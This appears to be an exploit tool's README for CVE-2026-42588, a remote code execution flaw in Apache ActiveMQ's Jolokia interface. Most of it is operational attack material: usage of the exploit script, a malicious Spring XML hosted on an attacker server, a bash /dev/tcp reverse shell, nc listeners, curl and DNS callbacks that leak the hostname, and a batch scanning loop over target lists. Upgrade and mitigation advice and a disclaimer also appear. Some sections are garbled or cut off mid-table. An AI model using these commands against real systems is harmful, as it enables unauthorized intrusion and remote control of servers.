## https://sploitus.com/exploit?id=E2D2E062-090F-5A3A-84ED-306A6EC90608
# CVE-2026-42588 β Apache ActiveMQ Jolokia Remote Code Execution Vulnerability Exploitation
> **Criticality level**: π΄ High risk (CVSS 4.0: 8.1)
> **Vulnerability type**: CWE-94 β Code injection
> **Affected versions**: Apache ActiveMQ
> **Exploitation conditions**: Requires Web Console authentication credentials (default: `admin:admin`)
---
## π Table of Contents
- [Overview of vulnerability](#Overview)
- [Principle of vulnerability](#Principle)
- **Affected versions**: Apache ActiveMQ
- **Exploitation conditions](#Conditions)
- [File description](#Description)
- **Quick start guide](#QuickStart)
- **Detailed usage instructions](#Usage)
- **Exploitation chain diagram](#ChainDiagram)
- **Verifying successful exploitation](#Verification)
- **Repair solutions](#Fixes)
- **Temporary mitigation measures](#Mitigation)
- **FAQs](#FAQs)
- **Disclaimer](#Disclaimer)
- **Reference links](#Links)
---
## Overview of Vulnerability
**CVE-2026-42588** is a remote code execution vulnerability present in **Apache ActiveMQ**. An attacker can exploit this vulnerability by calling the `BrokerService.addNetworkConnector(String)` method through the **Jolokia JMX-HTTP bridge interface** (`/api/jolokia/`). A carefully crafted `masterslave://` discovery URI is passed as an argument. The `xbean:` protocol is used to load a remote **Spring XML configuration file**, allowing the attacker to execute arbitrary system commands on the ActiveMQ Brokerβs JVM.
---
## Principle of Vulnerability
### Exploitation chain
```
/api/jolokia/ (Jolokia JMX-HTTP Bridge)
β
βΌ
BrokerService.addNetworkConnector(String)
β
βΌ
masterslave://?brokerConfig=xbean:http://attacker/malicious.xml
β
βΌ
XBeanBrokerFactory β ResourceXmlApplicationContext
β
βΌ
Spring pre-instantiates all singleton beans β Triggering Runtime.exec() / ProcessBuilder
β
βΌ
π¨ Remote code execution (RCE)
```
### Key points
| Stage | Description |
|------|------|
| **Jolokia exposure** | The ActiveMQ Web Console exposes `/api/jolokia/` by default, allowing `exec` operations on `org.apache.activemq:*` MBeans |
| **Dangerous method** | `BrokerService.addNetworkConnector(String)` receives and parses the discovery URI |
| **URI triggering chain** | The `brokerConfig` parameter of the `masterslave://` protocol is controllable. Combined with the `xbean:` scheme, it triggers Spring context loading |
| **RCE trigger point** | XBeanBrokerFactory uses `ResourceXmlApplicationContext` to load the remote XML. Spring instantiates all singleton beans before configuration validation |
---
## Affected Versions
| Version range | Status |
|--------------|------|
| Apache ActiveMQ **malicious.xml**
---
### Hosting malicious XML files
Start an HTTP server on the attackerβs machine:
```bash
python3 -m http.server 8080
```
### Exploiting the vulnerability
```bash
# Using default credentials: admin/admin
python CVE-2026-42588_EXP.py \
-u http://192.168.1.100:8161 \
-x http://your-attacker-ip:8080/malicious.xml
# Using custom credentials
python CVE-2026-42588_EXP.py \
-u http://target:8161 \
-U myuser \
-P mypass \
-x http://your-attacker-ip:8080/malicious.xml
```
### (Optional) Checking only for vulnerabilities
```bash
python CVE-2026-42588_EXP.py -u http://192.168.1.100:8161 --check-only
```
---
## Detailed Usage Instructions
### Command-line parameters
```
usage: CVE-2026-42588_EXP.py [-h] [-u URL] [-U USERNAME] [-P PASSWORD]
[-x XML_URL] [--check-only] [--gen-xml]
[-c COMMAND] [--timeout TIMEOUT] [--no-verify]
Options:
-u, --url Target ActiveMQ URL (e.g., http://192.168.1.100:8161)
-U, --username Web Console username (default: admin)
-P, --password Web Console password (default: admin)
-x, --xml-url Remote URL of the malicious Spring XML file
--check-only Only check whether the Jolokia interface is accessible
--gen-xml Generate and output the malicious XML file to stdout
-c, --command Command to execute on the target (default: touch /tmp/activemq_pwned)
--timeout Timeout seconds for HTTP requests (default: 30)
--no-verify Disables SSL certificate verification
```
### Scenario 1: Reversing the shell
**1. Generate the malicious XML on the attackerβs machine:**
```bash
python CVE-2026-42588_EXP.py --gen-xml \
-c "/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'" \
> reverse_shell.xml
**2. Hosting the XML and starting listening:**
```bash
# Terminal 1: HTTP service
python3 -m http.server 8080
# Terminal 2: nc listening
nc -lvnp 4444
```
**3. Triggering the vulnerability:**
```bash
python CVE-2026-42588_EXP.py \
-u http://target:8161 \
-x http://10.0.0.1:8080/reverse_shell.xml
```
### Scenario 2: CMD command execution (Windows target)
**1. Generating a malicious XML for Windows:**
Modify the ProcessBuilder command in `malicious.xml` as follows:
```xml
cmd.exe
/c
whoami > C:\windows\temp\pwned.txt
```
**2. Hosting and executing it:**
```bash
python CVE-2026-42588_EXP.py \
-u http://windows-target:8161 \
-x http://attacker:8080/malicious_win.xml
```
### Scenario 3: Only vulnerability detection
```bash
# Batch detection
for ip in $(cat targets.txt) do
echo "=== Testing $ip ==="
python CVE-2026-42588_EXP.py -u "http://$ip:8161" --check-only --timeout 5
done
```
---
## Utilizing the chain diagram
```
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β CVE-2026-42588 attack chain β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β β
β β Attacker β€ ActiveMQ Broker (JVM) β
β ββββββββββββ βββββββββββββββββββββββββββββββ β
β β EXP script βββββ β‘ HTTP POST ββββββββΆβ /api/jolokia/ β β
β β β Jolokia exec() β β β
β β β Basic Auth β BrokerService. β β
β β β β addNetworkConnector( β β
β β β β "masterslave://? β β
β β β β brokerConfig= β β
β β β β xbean:http://... β β
β β β β /malicious.xml" β β
β ββββββββββββ β ) β β
β β ββββββββββββββββββββββββββββ β
β β β β
β β β’ HTTP GET βΌ β
β β ββββββββββββββββββββββββ ββββββββββββββββββββββββββββββ β
β βββΆβ attacker HTTP server β β ResourceXmlApplication β β
β β (python http.server) β β Context loading of remote XML β β
β β β β β β
β β malicious.xml β β Spring pre-instantiated Bean βββΆ β β
β ββββββββββββββββββββββββ β Runtime.exec() / β β
β β ProcessBuilder.start() β β
β β β β β
β β βΌ β β
β β π¨ RCE successful π¨ β β
```
β ββββββββββββββββββββββββββββββ β
β β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
```
---
## Verifying Successful Exploitation of the Vulnerability
Since command execution occurs during the Spring XML parsing phase, which is **asynchronous**, the execution result may not be directly reflected in the HTTP response. It is recommended to verify using the following methods:
### Method 1: Reverse Shell (Most Reliable)
```bash
# On the attacker machine
nc -lvnp 4444
```
### Method 2: DNS Outbound (OOB)
```bash
# Use nslookup or curl in the command
nslookup $(hostname).your-dns-server.com
```
### Method 3: File Detection
```bash
# Check the log file on the target machine
ls -la /tmp/activemq_pwned
```
### Method 4: HTTP Connection
```bash
# Use it in the malicious XML
curl http://your-server:8888/$(hostname)
# Listen on the attacker machine as well
nc -lvnp 8888
```
---
## Fixing Solutions
### β Recommended Solution: Upgrade the Version
| Version | Upgrade to |
|---------|-------------|
| 5.x Series | **5.19.7** or higher |
| 6.x Series | **6.2.6** or higher |
Download link: [https://activemq.apache.org/download](https://activemq.apache.org/download)
Patch announcement: [https://lists.apache.org/thread/ns0zktfo16s9ql2mmtqtlb6p6xcs45xm](https://lists.apache.org/thread/ns0zktfo16s9ql2mmtqtlb6p6xcs45xm)
---
## Temporary Mitigation Measures
If you cannot upgrade temporarily, you can take the following measures to reduce risks:
### 1. Limit Access to the Jolokia Interface
Limit access to `/api/jolokia/` from local access only, or use a firewall/reverse proxy with an IP whitelist. ### 2. Modify Jolokia Access Policies
Edit `conf/jolokia-access.xml` and disable the `exec` operation for `org.apache.activemq:*` MBeans:
```xml
org.apache.activemq:*
!exec
```
### 3. Change the Default Credentials
Edit `conf/jetty-realm.properties` and change the default credentials from `admin:admin, admin` to a strong password. ### 4. Disable the Web Console (If Not Needed)
Comment out the Web Console-related configurations in `conf/jetty.xml`. ---
## FAQ
### Q: Is authentication required for this vulnerability? **A:** Yes, valid credentials for the ActiveMQ Web Console are required. However, the default credentials are `admin/admin`, and many systems do not change their default passwords in actual environments. Therefore, the risk remains high. ### Q: What if there is no output after EXP execution? **A:** This is normal. Command execution is asynchronous and occurs during Spring XML parsing. It is recommended to use reverse shells, DNS outbound methods, etc. to verify. See [Verifying Successful Exploitation of Vulnerability](#VerifyingSuccessfulExploitationOfVulnerability) for details. ### Q: Does it support Windows targets? **A:** Yes. You need to change the command in `malicious.xml` from `/bin/sh -c` to `cmd.exe /c`, and adjust the command syntax to Windows style. ### Q: Can the detection mode (`--check-only`) confirm whether the vulnerability exists? **A:** The detection mode can only confirm whether the Jolokia interface is accessible (a necessary condition for exploiting the vulnerability). Being able to access the interface does not mean it can be exploited, but there is a possibility of exploitation. ### Q: Can the vulnerability still be exploited after patching? **A:** No. After upgrading to 5.19.7+ or 6.2.6+, the `brokerConfig` parameter parsing logic has been fixed, and the `xbean:` scheme is no longer accepted. ---
## Disclaimer
> β οΈ **This tool is for security research and authorized testing purposes only! **
>
> - Using this tool for unauthorized system access is **illegal**.
> - Users must bear all consequences and responsibilities arising from using this tool.
> - The author is not responsible for any unauthorized use, abuse, or damages resulting from it.
> - Use this tool on your own system or on a system authorized by written permission.
> - Comply with local laws and professional ethics guidelines.
---
## Reference Links
| Source | Link |
|-------|-------|
| Vulnerability database (CVE Detail) | [https://www.cybersecurity-help.cz/vdb/vulns/133395/](https://www.cybersecurity-help.cz/vdb/vulns/133395/) |
| Antiy vulnerability announcement | [https://bbs.antiy.cn/thread-210844-1-1.html](https://bbs.antiy.cn/thread-210844-1-1.html) |
| DDPOC vulnerability details | [https://ddpoc.com/DVB-2026-11290.html](https://ddpoc.com/DVB-2026-11290.html) |
| Apache ActiveMQ official website | [https://activemq.apache.org/](https://activemq.apache.org/) |
| Apache security announcements | [https://lists.apache.org/thread/ns0zktfo16s9ql2mmtqtlb6p6xcs45xm](https://lists.apache.org/thread/ns0zktfo16s9ql2mmtqtlb6p6xcs45xm) |
---
CVE-2026-42588 β For Educational & Authorized Testing Purposes Only